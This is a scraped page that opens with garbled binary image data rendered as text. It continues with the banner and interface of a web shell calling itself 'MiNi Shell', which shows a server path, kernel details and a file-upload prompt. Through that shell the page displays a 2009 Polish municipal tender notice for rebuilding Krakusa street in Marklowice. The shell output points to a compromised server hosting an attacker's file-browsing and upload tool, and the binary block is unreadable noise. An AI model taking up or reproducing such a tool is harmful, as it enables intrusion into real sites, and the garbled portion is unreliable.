JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090910/152135-N-2009.html

<p class="kh_header"><b>Marklowice: Poprawa atrakcyjności  inwestycyjnej Gminy Marklowice poprzez przebudowę drogi wraz z odwodnieniem i oświetleniem ulicy Krakusa w Marklowicach</b><br>
<b>Numer ogłoszenia: 152135 - 2009; data zamieszczenia: 10.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Wyzwolenia 71, 44-321 Marklowice, woj. śląskie, tel. 44-321, faks 032 4550020.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.marklowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa atrakcyjności  inwestycyjnej Gminy Marklowice poprzez przebudowę drogi wraz z odwodnieniem i oświetleniem ulicy Krakusa w Marklowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
Przebudowę istniejącej drogi gminnej ul. Krakusa do drogi jednojezdniowej dwupasowej jako drogi lokalnej (KL), o kategorii ruchu KR2.
Do wykonania odcinek o dł. 1800,00 mb o szer. 5,0 mb. Droga będzie ograniczona krawężnikami betonowymi 15*30 cm w terenie pomiędzy zabudowaniami, a poza tym terenem krawężnikami wtopionymi 12*25 cm. Na całej długości zaprojektowano spadek daszkowy 2%. Zaprojektowano pobocze utwardzone o zmiennej szerokości. Warstwa ścieralna zostanie wykonana na podbudowie tłuczniowej (na poszerzeniu) i  podbudowie wykonanej metodą głębokiego recyklingu (na istniejącej nawierzchni) z zastosowaniem dodatku cementu portlandzkiego 32,5 oraz stabilizatora EN-1. Zaprojektowano wjazdy do posesji z kostki brukowej gr. 8 cm.
Do wykonania jest również zaprojektowana kanalizacja deszczowa na odcinku pomiędzy zabudowaniami o dł. 350,0 mb z rur PCV fi 315 i fi 250 ze studniami z kręgów betonowych fi 1000.
Do wykonania jest również modernizacja oświetlenia ulicznego na przedmiotowym odcinku - przebudowa 28 istniejących pkt.  świetlnych i budowa 29  pkt.  świetlnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości 50.000,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki :

1/ Posiadają uprawnienia  do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2/ Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
Oferent powinien mieć do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej stanowisk:
Kierownik budowy- min. 10 lat dośw. zawodowego, min. 7 lat dośw. przy robotach podobnych, min. 5 lat jako kierownik robót podobnych.
Kierownik robót- min. 5 lat dośw. zawodowego, min. 2 lat dośw. przy robotach podobnych, min. 2 lat jako kierownik robót podobnych.
Wymagane wykształcenie i uprawnienia:
wykształcenie wyższe lub średnie techniczne budowlane
uprawnienia budowlane  dla kierownika budowy, kierowników robót w branżach zgodnych z przedmiotem zamówienia, odpowiednie uprawnienia SEP dla pracowników(dla robót elektrycznych) aktualne zaświadczenie z izby branżowej
3/ Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4/ Nie podlegają wykluczeniu z postępowania na podstawie art.24 ustawy.
5/ Wykonawca musi udowodnić zrealizowanie  w okresie ostatnich 5 lat minimum 2 zadań o charakterze i złożoności porównywalnej z zakresem tego zadania(Zamawiający przyjmuje, że będzie to min. 1 zadanie polegające na wykonaniu modernizacji nawierzchni metodą głębokiego recyklingu o wartości minimalnej 500.000,00 zł, oraz min. 1 zadanie polegające na budowie lub modernizacji nawierzchni asfaltowej metodą (tradycyjną) o wartości minimalnej 500.000,00 zł ),  poprzez przedstawienie referencji od poprzednich zamawiających.
6/ Posiadają ważne na czas wykonania i odbioru przedmiotu zamówienia świadectwa dopuszczające materiały użyte do realizacji zamówienia do stosowania na polskim rynku.
7/ Posiadają lub mają zapewniony dostęp do w pełni sprawnego sprzętu gwarantującego uzyskanie wymaganej jakości robót.
8/ Udzielą min. 36 miesięcznej gwarancji na wykonanie przedmiotu zamówienia od daty odbioru końcowego całości zadania.

Ocena spełniania przez wykonawcę warunków udziału w postępowaniu odbędzie się poprzez analizę oświadczeń i dokumentów złożonych w przedmiotowym postępowaniu przetargowym..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1/ Formularz ofertowy  
2/ Dowód wpłacenia, wniesienia wadium.
3/ Zestawienie załączonych dokumentów
4/ Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 Ustawy Prawo Zamówień Publicznych
5/Wykaz  robót zrealizowanych przez wykonawcę w okresie ostatnich 5 lat, a jeśli okres działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem przedmiotowi zamówienia z podaniem ich wartości oraz daty i miejsca wykonania
6/ Wykaz oraz kopie referencji wykonanych robót wystawionych przez inwestora (jak w pkt.5)opatrzone datą ich wystawienia  z podaniem ich wartości  i miejsca wykonania
7/ Oświadczenie o zapoznaniu się i przyjęciu bez uwag wzoru umowy
8/ Dane dotyczące ewentualnych podwykonawców i zakresu powierzonych im części zamówienia
    Wykonawca musi wykonać własnymi siłami minimum 40% wartości całego zamówienia.
    Dane dotyczące ewentualnych podwykonawców powinny być potwierdzone informacjami i dokumentami na temat  uprawnień podwykonawcy i jego doświadczenia.
9/Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
10/ Szczegółowy kosztorys ofertowy oraz dodatkowo skrócony kosztorys z cenami jednostkowymi robót, dostaw, usług.
11/ Zaświadczenie z Zakładu Ubezpieczeń Społecznych o braku zaległości w uiszczaniu należnych składek lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty należnych płatności.
12/ Zaświadczenie z właściwego Urzędu Skarbowego o braku zaległości podatkowych lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty należnych płatności.
13/ Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 i pkt 9ustawy prawo zamówień publicznych.
14/ Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wraz z dokumentami potwierdzającymi wymagane uprawnienia(branża drogowa, elektryczna, instalacyjna).
15/ Polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
16/ Harmonogram rzeczowo - finansowy realizacji przedmiotu zamówienia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.marklowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY MARKLOWICE - WYDZIAŁ INFRASTRUKTURY TECHNICZNEJ I ROZWOJU  44-321 Marklowice ul. Wyzwolenia 71 pok.302.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 09:30, miejsce: URZĄD GMINY MARKLOWICE - WYDZIAŁ INFRASTRUKTURY TECHNICZNEJ I ROZWOJU  44-321 Marklowice ul. Wyzwolenia 71 pok.302.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com